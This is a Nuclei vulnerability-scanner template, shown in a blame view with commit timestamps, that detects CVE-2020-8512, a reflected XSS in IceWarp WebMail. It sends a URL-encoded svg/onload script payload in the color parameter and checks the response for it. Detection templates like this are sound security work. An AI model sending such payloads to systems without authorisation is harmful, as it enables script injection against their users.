nuclei-templates/cves/2020/CVE-2020-8512.yaml

29 lines
756 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-8512
2020-06-26 03:44:54 +00:00
info:
name: IceWarp WebMail XSS
author: pdnuclei & dwisiswant0
2020-06-26 03:44:54 +00:00
severity: medium
2020-08-25 22:52:00 +00:00
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
reference: https://www.exploit-db.com/exploits/47988
tags: cve,cve2020,xss
2020-06-26 03:44:54 +00:00
# https://twitter.com/sagaryadav8742/status/1275170967527006208
2020-06-26 03:44:54 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
matchers-condition: and
2020-06-26 03:44:54 +00:00
matchers:
- type: word
words:
- "<svg/onload=alert(document.domain)>"
2020-06-26 03:44:54 +00:00
part: body
- type: status
status:
2020-08-25 22:52:00 +00:00
- 200
- type: word
words:
- "text/html"
part: header